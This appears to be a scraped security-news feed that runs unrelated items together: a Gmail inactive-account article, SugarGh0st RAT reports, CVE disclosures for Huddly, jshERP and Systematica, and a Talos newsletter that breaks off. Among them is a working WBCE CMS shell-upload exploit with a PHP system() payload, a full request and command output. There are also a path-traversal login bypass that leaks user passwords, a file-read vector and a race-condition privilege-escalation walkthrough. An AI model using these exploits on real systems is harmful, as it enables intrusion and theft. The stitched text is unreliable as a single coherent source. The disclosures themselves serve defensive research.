By Deeba Ahmed
Google will delete free Google accounts that have not been signed into for two years and do not have any active subscriptions.
This is a post from HackRead.com Read the original post: Google to Delete Inactive Gmail Accounts From Today: What You Need to Know

According to Google, once your Gmail account is deleted, it will not be possible to recover photos, files, emails, contact information, or purchases such as music, apps, movies, or books that you may have acquired using your Google account.

Google has officially released its inactive account policy according to which it will delete free Google accounts that have not been signed into for two years and do not have any active subscriptions. This policy applies to personal Google Accounts, not those not set up through school, work, or other organizations.

However, this policy doesn’t apply to paid Google Workspace accounts or accounts with an active subscription. For instance, if you have subscribed to Google One, your account will remain active even without regular sign-ins. If you maintain any paid subscriptions within an app via Google Play, this will also be considered an activity.

A Google Account is necessary to access the different Google products, including Gmail, YouTube, and Google Ads, with a single username and password. The updated policies were announced in May 2023 and will be implemented starting 1st December 2023.

So, if it’s been two years since you used your free Google account, Google may delete it. Per the policies, if deleted, it won’t be possible to recover photos, files, emails, contact information, or purchases such as music, apps, movies, or books you may have acquired using your Google account. If you want to keep your Google account active, sign into it at least once every two years and perform any activity.  

For your information, Google considers a Google account active that is regularly used. This is indicated by several activities, such as watching a YouTube video, Google search, downloading apps, using Google Drive, or checking Gmail.

The account tracks Google account activity, and not the device, so any actions taken on a device while being signed into a Google Account will be an activity. You must also sign in to Photos at least once every two years to maintain access to Google Photos and any photos uploaded from your free account. To sign in, you can use Google Photos web or mobile version.

It is possible to maintain access to your Google account and its content because Google lets you choose people who can access your account if you cannot do so yourself. Before deleting the account, Google will notify the account owner via emails sent to the Google Account and to the recovery email (if applicable).

If you don’t want or need a Google account, you can allow it to be deleted after a period of inactivity or delete it yourself. However, make sure to export any stored data using Google Takeout.

To delete a Google account, sign in with the account you want to delete, go to the Data & Privacy page, scroll to the bottom, and select Delete Your Google Account. Follow the prompts to authenticate and confirm that you want to delete the account.

Keeper Security’s VP of Security and Compliance, Patrick Tiquet, shared the following comment on this newly implemented policy with Hackread.com.

“Inactive accounts can present significant cybersecurity risks, as these accounts may retain weak or unchanged passwords, creating vulnerabilities for unauthorized access and potential misuse by cybercriminals for phishing attacks or data exposure. When you combine the personal information stored in these accounts and potential interconnections to other services, there is a heightened risk of identity theft and unauthorized access to linked accounts. Additionally, the lack of monitoring for inactive accounts increases the likelihood of users being unaware of suspicious activities, allowing bad actors more time to exploit the compromised accounts.”

Synopsys Software Integrity Group’s associate principal security consultant, Ben Hutchison, also shared his thoughts on this development.

“Continuing to maintain a large number of inactive accounts is a little bit like not replacing those old, cracked windows on your property and in essence the potential attack surface of the system. Inactive accounts provide a means of potential ingress or compromise for attackers to take advantage of, and since they have by definition gone unused for long periods of time, they may be protected by weak locks (passwords) and their owners (users) are unlikely to notice signs of compromise or unauthorized activity.”

“Compromising one account may lead to a cascade if the account compromised enables access to other platform services, the user reuses their password for other accounts or in the specific case of email compromise, providing attackers with the opportunity to abuse account reset workflows for other systems/services in combination with compromised credentials in the hope that the compromised account is linked to one of these, leading to further eventual takeovers,” Hutchison added.

****_RELATED ARTICLES_****

1.  Google offers Dark Web monitoring for US Gmail users
2.  Google will ‘auto-delete’ your location & web activity data
3.  How to Delete Your Facebook Account Permanently – Guide
4.  Is It Possible to Delete Yourself From the Internet Altogether?
5.  Facebook Messenger to offer Unsend feature to delete sent messages

Google to Delete Inactive Gmail Accounts From Today: What You Need to Know

WBCE CMS version 1.6.1 suffers from a remote shell upload vulnerability.

# Exploit Title: WBCE CMS Version : 1.6.1  Remote Command Execution  
# Date: 30/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip  
# Version: 1.6.1  
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1 ) Login with admin cred and click Add-ons  
2 ) Click on Language > Install Language  > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php  
4 ) You will be see id command result 

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 

### Post Request:

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1  
Host: demos6.softaculous.com  
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459  
Content-Length: 522  
Origin: https://demos6.softaculous.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"  
Content-Type: application/x-php

<?php echo system('id'); ?>

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="submit"

-----------------------------86020911415982314764024459--

### Response : 



  
<div class="row" style="overflow:visible">  
<div class="fg12">  
<table id="former_positioning_table">  
<tr>  
    <td class="content">  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
    <div class="top alertbox_error fg12 error-box">  
        <i class=" fa fa-2x fa-warning signal"></i>

                    <p>Invalid WBCE CMS language file. Please check the text file.</p>

                            <p><a href="index.php" class="button">Back

WBCE CMS 1.6.1 Shell Upload

A suspected Chinese-speaking threat actor has been attributed to a malicious campaign that targets the Uzbekistan Ministry of Foreign Affairs and South Korean users with a remote access trojan called SugarGh0st RAT.
The activity, which commenced no later than August 2023, leverages two different infection sequences to deliver the malware, which is a customized variant of Gh0st RAT

Malware / Cyber Espionage

A suspected Chinese-speaking threat actor has been attributed to a malicious campaign that targets the Uzbekistan Ministry of Foreign Affairs and South Korean users with a remote access trojan called **SugarGh0st RAT**.

The activity, which commenced no later than August 2023, leverages two different infection sequences to deliver the malware, which is a customized variant of Gh0st RAT (aka Farfli).

It comes with features to "facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code," Cisco Talos researchers Ashley Shen and Chetan Raghuprasad said.

The attacks commence with a phishing email bearing decoy documents, opening which activates a multi-stage process that leads to the deployment of SugarGh0st RAT.

The decoy documents are incorporated within a heavily obfuscated JavaScript dropper that's contained within a Windows Shortcut file embedded in the RAR archive email attachment.

"The JavaScript decodes and drops the embedded files into the %TEMP% folder, including a batch script, a customized DLL loader, an encrypted SugarGh0st payload, and a decoy document," the researchers said.

The decoy document is then displayed to the victim, while, in the background, the batch script runs the DLL loader, which, in turn, side-loads it with a copied version of a legitimate Windows executable called rundll32.exe to decrypt and launch the SugarGh0st payload.

A second variant of the attack also begins with a RAR archive containing a malicious Windows Shortcut file that masquerades as a lure, with the difference being that the JavaScript leverages DynamicWrapperX to run shellcode that launches SugarGh0st.

SugarGh0st, a 32-bit dynamic-link library (DLL) written in C++, establishes contact with a hard-coded command-and-control (C2) domain, allowing it to transmit system metadata to the server, launch a reverse shell, and run arbitrary commands.

It can also enumerate and terminate processes, take screenshots, perform file operations, and even clear the machine's event logs in an attempt to cover its tracks and evade detection.

The campaign's links to China stem from Gh0st RAT's Chinese origins and the fact that the fully functional backdoor has been widely adopted by Chinese threat actors over the years, in part driven by the release of its source code in 2008. Another smoking gun evidence is the use of Chinese names in the "last modified by" field in the metadata of the decoy files.

"The Gh0st RAT malware is a mainstay in the Chinese threat actors' arsenal and has been active since at least 2008," the researchers said.

"Chinese actors also have a history of targeting Uzbekistan. The targeting of the Uzbekistan Ministry of Foreign Affairs also aligns with the scope of Chinese intelligence activity abroad."

The development comes as Chinese state-sponsored groups have also increasingly targeted Taiwan in the last six months, with the attackers repurposing residential routers to mask their intrusions, according to Google.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Using SugarGh0st RAT to Target South Korea and Uzbekistan

An issue was discovered in Huddly HuddlyCameraService before version 8.0.7, not including version 7.99, allows attackers to manipulate files and escalate privileges via RollingFileAppender.DeleteFile method performed by the log4net library.

2023-11-20

This article provides technical descriptions of two vulnerabilities that allowed for local privilege escalation in HuddlyCameraService. During a previous assessment, these vulnerabilities helped to escalate privileges from regular user to SYSTEM, establish command and control (C2), evade the installed EDR by DLL sideloading a non-Microsoft binary, and install persistence on the host since the service started on system boot.  

The first vulnerability, CVE-2023-45252, enabled privilege escalation due to the service being installed in a directory that grants write privileges to regular users. The second vulnerability, which was identified as CVE-2023-45253, enabled local privilege escalation through a privileged file operation executed by the service under the SYSTEM user context. 

The vulnerabilities were reported on August 10, 2023, and Huddly promptly addressed them by releasing a fix on September 21, 2023. The solution to resolve these vulnerabilities involves upgrading to version 8.0.7 of the program, officially released on September 21, 2023. Our team has thoroughly tested this patch, and it has effectively rectified the issues.

Official release notes and security advisory can be found at this Huddly support page.

**Privilege Escalation via Insecure Installation Directory (CVE-2023-45252) **

The first vulnerability, identified as CVE-2023-45252, enabled privilege escalation due to the service being installed in a directory that grants write privileges to regular users, affecting version <8.0.7 of Huddly’s Camera Windows software. 

**Identification and Exploitation **

By using Microsoft's Process Monitor (ProcMon), which can be used to analyze and monitor file operations on a Windows system, it was found that the HuddlyCameraService.exe file was executed as NT AUTHORITY\\SYSTEM from the C:\\Windows\\Temp\\.net\\HuddlyCameraService folder, as highlighted in Figure 1. Additionally, the process attempted to load missing dynamic-link library (DLL) files from the same folder. 

_Figure 1 - Process attempting to load missing DLLs._

Due to regular users having write permissions in C:\\Windows\\Temp\\.net\\HuddlyCameraService, which contains permissions inherited from C:\\Windows\\Temp, the service was susceptible to a local privilege escalation attack that could be exploited through a DLL hijacking attack. The permission inheritance is demonstrated in Figure 2 and Figure 3.

Figure 2 - Permissions for C:\\Windows\\Temp.

Figure 3 - Permissions for C:\\Windows\\Temp\\.net\\HuddlyCameraService.

To exploit the vulnerability, an adversary could drop a payload as one of the missing DLLs into C:\\Windows\\Temp\\.net\\HuddlyCameraService\\IQQF1G9DDW8qNL0XgxzvxAVCQLDvvYE=, and then reboot the machine. This often works because Windows uses a pre-defined search path to find DLL, which searches in a specific order.

****Arbitrary File Write Leading to Privilege Escalation (CVE-2023-45253)****

The second vulnerability, identified as CVE-2023-45253, enabled local privilege escalation through a privileged file operation executed by the service under the SYSTEM user context

This vulnerability affects version <8.0.7 of Huddly’s Camera Windows software. 

**Identification**

When the log4net library performs a rollover via the RollingFileAppender class (an Appender that rolls log files based on size or date or both), and if the maximum number of size backups is reached (set with maxSizeRollBackups), then the oldest file is deleted, as can be seen in Figure 4.

Figure 4 - DeleteFile when maxSizeRollBackups is reached.

The DeleteFile method will delete a file if it exists. Figure 5 shows that a new filename is generated, containing a tick count, which is the number of milliseconds elapsed since the system started. Then, the file is first moved to a new filename and then deleted. This allows the file to be removed even when it cannot be deleted, but it still can be moved.

_Figure 5 - DeleteFile generates a new name and moves/renames the file._

By following the call chain for System.IO.File.Move, it ends up calling Kernel32$MoveFileEx. This is where the flaw is - the service does never attempt to impersonate the user but performs all actions in the context of NT AUTHORITY\\SYSTEM. Therefore, the file move operation is done on a file that unprivileged users can manipulate in the context of NT AUTHORITY\\SYSTEM. If files are moved from C:\\ProgramData\\Huddly\\Logs\\ to, for example, C:\\Program Files\\Huddly, then the file moved to the new location will have access rights inherited from the old location, as demonstrated in Figure 6.

_Figure 6 - Inherited access rights on FakeDll.dll after successful exploitation._

By using Microsoft's Process Monitor (ProcMon), the file operations performed by the HuddlyCameraService can be seen, as shown in Figure 7.

_Figure 7 - ProcMon shows the file operations performed by the Huddly service._

The SetRenameInformationFile call originates from the Win32 MoveFileEx() function. Further inspecting the operation showed that it did not impersonate the user but was executed as NT AUTHORITY\\SYSTEM, as demonstrated in Figure 8. If the application did impersonate the user, it would have included Impersonating: <domain>\\<username> in the Event Properties.

_Figure 8 - No impersonation is being performed by the service._

The arbitrary file move as SYSTEM results in a Local Privilege Escalation. To exploit the vulnerability, an adversary could drop a payload as one of the missing DLLs into C:\\Windows\\Temp\\.net\\HuddlyCameraService\\IQQF1G9DDW8qNL0XgxzvxAVCQLDvvYE=,  as shown in Figure 9. After rebooting the machine, the malicious code would be executed as SYSTEM. There are also multiple other ways to escalate privileges with the ability to move files as SYSTEM.

_Figure 9 - Paths that resulted in NAME NOT FOUND._

**Exploitation**

When the service creates test.5.log, the service will soon open the file again to be moved/renamed. There is a short time between the file creation and the file move operation, where the attacker can modify the behavior of the file move. The exploit code will place an Opportunistic Lock (Oplock) on the test.5.log after the service creates it because this will allow the attacker to block file operations on a given file for as long as they choose to hold the lock, making it easier to win the race. The attacker cannot perform any operations on the file while the Oplock is there. However, the attacker can achieve what they want by creating Object Manager symbolic links.

Therefore, the strategy to exploit this flaw is configuring the logging with a maximum file size of 0 and setting the log folder to a folder initially used as a junction point to another "physical" directory. Then, when the service is started, it will write the logs into the junction and store them inside the other physical folder. When this is done, we can continue to phase 2 of the exploit.

Phase 2 of the exploit will attempt to open test.log.5. When it successfully opens the file, it will place an Oplock on the file. When the Oplock is triggered, the exploit code generates a new filename with the tick count, switches the mountpoint to an Object Directory, and creates two symbolic links. The test.log.5 file will point to a file owned by the attacker, and the test.log.5.TickCount.DeletePending file will point to where the attacker wants to write, for example, C:\\Program Files\\Huddly\\FakeDll.dll. After releasing the Oplock, the service will perform the final move operation through the two symbolic links. These steps are described in more detail below.

**Prepare the workspace and log4net configuration**

Create the workspace directory with the following structure:

C:\\ProgramData\\Huddly\\Logs\\workspace

|\_\_ <DIR> bait

|\_\_ <DIR> mountpoint

|\_\_ FakeDll.dll

The mountpoint directory will first be a junction to the bait directory, then switched to a junction to the RPC Control Object Directory. The DLL file is the file to be moved to a secure location such as C:\\Program Files\\Huddly\\.

Additionally, as shown in Figure 10, the log4net configuration file will be updated to write into the mountpoint directory, and the maximumFileSize will be set to 0. The maxSizeRollBackups decide how many backup files there will be. The default was five, which is why we will be looking for test.log.5.

_Figure 10 - log4net configured for exploitation._

**Create the mountpoint from mountpoint to bait**

C:\\ProgramData\\Huddly\\Logs\\workspace\\mountpoint -> C:\\ProgramData\\Huddly\\Logs\\workspace\\bait

**Start the service / reboot the machine**

The logs will be written to C:\\ProgramData\\Huddly\\Logs\\workspace\\bait\\test.log because of the junction created.

**Start phase 2 – Find the test.log.5 file and set an Oplock**

This phase will attempt to race the log4net rollover function. The exploit code enters a loop that will attempt to open the test.log.5 file. When the file open is successful, an Oplock will be placed on it, which helps win the race by allowing us to pause the operation.

**Wait for the Oplock**

The Oplock will be triggered when log4net in the service opens the test.log.5. When the Oplock is triggered, the exploit generates the new file name, switches the mountpoint, and creates two symbolic links.

Before the switch:

C:\\ProgramData\\Huddly\\Logs\\workspace\\mountpoint -> bait

test.5.log = C:\\ProgramData\\Huddly\\Logs\\workspace\\mountpoint\\test.5.log -> C:\\ProgramData\\Huddly\\Logs\\workspace\\bait\\test.5.log

After the switch:

C:\\ProgramData\\Huddly\\Logs\\workspace\\mountpoint -> \\RPC Control

test.5.log = C:\\ProgramData\\Huddly\\Logs\\workspace\\mountpoint\\test.5.log -> C:\\ProgramData\\Huddly\\Logs\\workspace\\FakeDll.dll

C:\\ProgramData\\Huddly\\Logs\\workspace\\test.5.log.<TickCount>.DeletePending = C:\\Program Files\\Huddly\\FakeDll.dll

**Release the Oplock**

Upon Oplock release, the final MoveFileEx() call redirection will occur due to the symbolic links. Consequently, the DLL will be moved to the C:\\Program Files\\Huddly folder.

Figure 11 shows the important parts of the Proof of Concept code used to exploit the vulnerability.

 

_Figure 11 - Proof of concept code to exploit the vulnerability._

After a short time, the race is won, and the FakeDll.dll was placed inside C:\\Program Files\\Huddly with inherited access rights from C:\\ProgramData\\Huddly\\Logs, as was demonstrated in Figure 6 earlier. 

**Disclosure Timeline**

*   2023-08-07 – Identified the vulnerabilities
*   2023-08-10 – Vulnerabilities reported to Huddly
*   2023-08-28 – Huddly verified vulnerabilities
*   2023-09-21 –Patch available
*   2023-10-23 - Verified the effectiveness of the patch
*   2023-11-20 - Released the full disclosure of the vulnerabilities

**Acknowledgment**

I want to thank Huddly and everyone involved with the patch for these vulnerabilities. They were kind and demonstrated a collaborative spirit, making them easy to work with.

Article written by: Henrik Pedersen, XLENT Cyber Security Norway

**References**

1.  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking
2.  https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching
3.  https://learn.microsoft.com/en-us/sysinternals/downloads/procmon
4.  https://logging.apache.org/log4net/release/sdk/html/M\_log4net\_Appender\_RollingFileAppender\_DeleteFile.htm
5.  https://logging.apache.org/log4net/log4net-1.2.12/release/sdk/log4net.Appender.RollingFileAppender.RollOverRenameFiles.html
6.  https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/main
7.  https://itm4n.github.io/cve-2020-0787-windows-bits-eop/

CVE-2023-45253: Security Disclosure of Vulnerabilities: CVE-2023-45252 and CVE-2023-45253

Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.

1.The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java,and the affected function is doFilter.

In the filter code, use servletRequest.getRequestURI() to obtain the request path, and then determine whether the path contains /doc.html, /user/login, /user/register. If so, execute chain.doFilter(request, response) to skip this filter. Else, continue to check.

Then determine whether the path startswith allowUrls. If so, execute chain.doFilter(request, response) to skip this filter.

See the screenshot below for the value of allowUrls  
  

2.The problem lies in using servletRequest.getRequestURI() to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use ../ to bypass it. Taking one of the backend interfaces /jshERP-boot/user/getAllList as an example, using /user/login/../../jshERP-boot/user/getAllList can make it satisfy requestUrl.contains("/user/login" ), and at the same time, it can request the getAllList interface to achieve login bypass.

3.The Poc is as follows:

    GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
    Host: 192.168.124.1:9999
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

When accessing the /jshERP-boot/user/getAllList interface directly, it will return "loginOut".  

When accessing the /user/login/../../jshERP-boot/user/getAllList interface, the user information can be obtained by bypassing the access control,whice also includes user passwords.

CVE-2023-48894: There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system · Issue #98 · jishenghua/jshERP

Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)

**CVE-2021-35975**

Systematica SMTP Adapter versions prior to v2.0.1.101 are vulnerable to directory traversal, which may allow an attacker to read sensitive files.

CVSS v2: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVSS v2 Score (BS): 3

CVSS v3: (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

CVSS v3 Score (BS): 3.0

**Information**

**Description:** Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL.

Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25)

**Class:** Design Error

**Researcher:** Vadim Golovanov

**Issue date:** 2021-05-29 (Initial Advisory)

**Private release:** 2021-06-30

**Public release:** 2021-08-21

**Disclosure Link:**

**NIST CVE Link:**

**CWE:** 22 or 36 - Absolute Path Traversal

**POC**

**An example of vector:**

****

SMTP adapter http://SERVER:PORT/info?page=logfile&file=C:/windows/win.ini

ALSO ACTUAL FOR:

HTTP adapter, MSSQL MessageBus Proxy, Financial Calculator, FIX Adapter and others...

**POST RE-FINDING CVE:**

****

**CVE-2022-39838** https://github.com/jet-pentest/CVE-2022-39838

**Screenshots:**

********

CVE-2021-35975: GitHub - fbkcs/CVE-2021-35975: Path Traversal Vulnerability in Systematica SMTP Adapter and other sub-products

An Untrusted search path vulnerability in NetEase CloudMusic 2.10.4 for Windows allows local users to gain escalated privileges through the urlmon.dll file in the current working directory.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-47454: GitHub - xieqiang11/poc-3

A decade and a half after Gh0st RAT first appeared, the "SugarGh0st RAT" variant aims to make life sweeter for cybercriminals.

Source: Niday Picture Library via Alamy Stock Photo

A new variant of the infamous "Gh0st RAT" malware has been identified in recent attacks targeting South Koreans and the Ministry of Foreign Affairs in Uzbekistan.

The Chinese group "C.Rufus Security Team" first released Gh0st RAT on the open Web in March 2008. Remarkably, it's still in use today, particularly in and around China, albeit in modified forms.

Since late August, for instance, a group with strong Chinese links has been distributing a modified Gh0st RAT deemed "SugarGh0st RAT." According to research from Cisco Talos, this threat actor drops the variant via JavaScript-laced Windows shortcuts, while distracting targets with customized decoy documents.

The malware itself is still largely the same, effective tool it's ever been, though it now sports some new decals to help sneak past antivirus software.

**SugarGh0st RAT's Traps**

The four samples of SugarGh0st, likely delivered via phishing, arrive on targeted machines as archives embedded with Windows LNK shortcut files. The LNKs hide malicious JavaScript which, upon opening, drops a decoy document — targeted for Korean or Uzbek government audiences — and the payload.

Like its progenitor — the Chinese origin remote access Trojan, first released to the public in March 2008 — SugarGh0st is a clean, multitooled espionage machine. A 32-bit dynamic link library (DLL) written in C++, it begins by collecting system data, then opens up the door to full remote access capabilities.

Attackers can use SugarGh0st to retrieve any information they might desire about their compromised machine, or start, terminate, or delete the processes it's running. They can use it to find, exfiltrate, and delete files, and erase any event logs to mask the resulting forensic evidence. The backdoor comes fitted with a keylogger, a screenshotter, a means of accessing the device's camera, and plenty of other useful functions for manipulating the mouse, performing native Windows operation, or simply running arbitrary commands.

"The thing that's most concerning to me is how it's specifically designed to evade previous detection methods," says Nick Biasini, Cisco Talos' head of outreach. With this new variant, specifically, "they took effort to do things that would change the way that core detection would work."

It isn't that SugarGh0st has any particularly novel evasion mechanisms. Rather, minor aesthetic changes make it appear different from prior variants, such as changing the command-and-control (C2) communication protocol such that instead of 5 bytes, the network packet headers reserve the first 8 bytes as magic bytes (a list of file signatures, used to confirm a file's contents). "It's just a very effective way to try and make sure that your existing security tooling isn't going to pick up on this right away," Biasini says.

**Gh0st RAT's Old Haunts**

Back in September 2008, the office of the Dalai Lama approached a security researcher (no, this isn't the beginning of a bad joke).

Its employees were being peppered with phishing emails. Microsoft applications were crashing, without explanation, across the organization. One monk recalled watching his computer open Microsoft Outlook all on its own, attach documents to an email, and send that email to an unrecognized address, all without his input.

A Gh0st RAT beta model's English-language UI. Source: Trend Micro EU via Wayback Machine

The Trojan used in that Chinese military-linked campaign against Tibetan monks has stood the test of time, Biasini says, for a few reasons.

"Open source malware families live long because actors get a fully functional piece of malware that they can manipulate as they see fit. It also allows people who don't know how to write malware to leverage this stuff for free," he explains.

Gh0st RAT, he adds, stands out in particular as "a very functional, very well-built RAT."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

A New, Spookier Gh0st RAT Malware Haunts Global Cyber Targets

Fake Facebook ads seem to be the flavor of the month for scammers.

Thursday, November 30, 2023 14:00

I know I’m a little late to the party to hit the prime SEO for Black Friday, Cyber Monday and holiday shopping. But if I know the readers of this newsletter, everyone is far from done with their holiday shopping already after a few days. 

I also know I’m far from the only person to warn consumers about scams during this season, so I’m trying to split the difference and highlight a few specific scams and spam campaigns that are already circulating in the wild, some of which popped up right on Black Friday, so you don’t get caught in the remaining days leading up to the winter holidays. 

Fake Facebook ads seem to be the flavor of the month for scammers. This is completely anecdotal, but my mom almost got “got” with a fake Facebook post in a group she belongs to claiming to have some great deals on Nintendo Switch games on Amazon that were not actually real (thankfully she hadn’t clicked the link before she asked me if “Mario Odyssey” was a good deal at $15).  

Still, several other reports have shown that scammers are using Facebook ads to advertise a deal for a $19 Stanley cup — these are the water bottles all the influencers are using nowadays and, even when they are on sale, don’t go for any less than about $35. In this case, it looks like the actors are just looking to take your money or credit card information with a fake ordering process and no plans to send you anything. 

Adversaries have also set up fake Facebook pages and web pages disguising themselves as the retailer Big Lots. These fake ads and posts offer vague deals and sales on various products but instead point to typo-squatted Big Lots websites (or URLs that vaguely seem like they could be connected to Big Lots).  

Scammers are also sending mass emails to subscribers of various streaming services like Amazon Prime, Paramount+ and Peacock claiming that their subscription has lapsed, but they can resubscribe for a deeply discounted price, or even free, as part of a Black Friday special.  

Amazon also issued a warning recently that attackers have been sending emails with malicious attachments asking for users' personal information in exchange for having their “accounts” unlocked. 

This is just a sampling of the likely hundreds of different scams and spam campaigns attackers are deploying right now, so in general, when shopping online, here are a few tips: 

*   Only download apps from trusted and official app stores like the Google Play store and iOS App Store. 
*   Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features. 
*   Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as @gmail.com). 
*   Avoid clicking on unsolicited emails. Make sure you purposefully subscribed to any marketing emails you receive from retailers before opening it. 
*   Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals. 
*   Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure. 
*   Use unique, complex passwords, per site. Attackers commonly reuse passwords to compromise multiple accounts with the same username. Use a password locker if you have a hard time creating and remembering secure passwords. 
*   Manually type in URLs to sites you want to visit rather than clicking on links. 
*   Use multi-factor authentication, such as Cisco Duo, to log into your email account to avoid unauthorized access. 

Next week, Talos will have a holiday special of our own! On Dec. 5, we’ll be launching our second-ever Year in Review report, complete with all new data and insights about the attacks and malware we’ve seen in 2023. Stay tuned to our social media channels or blog for that release.  

**The one big thing **

Cisco Talos recently discovered a malicious campaign that likely started as early as August 2023, delivering a new remote access trojan (RAT) we dubbed “SugarGh0st.” We assess with high confidence that the SugarGh0st RAT is a new customized variant of Gh0st RAT, an infamous trojan that’s been active for more than a decade, with customized commands to facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code. 

**Why do I care? **

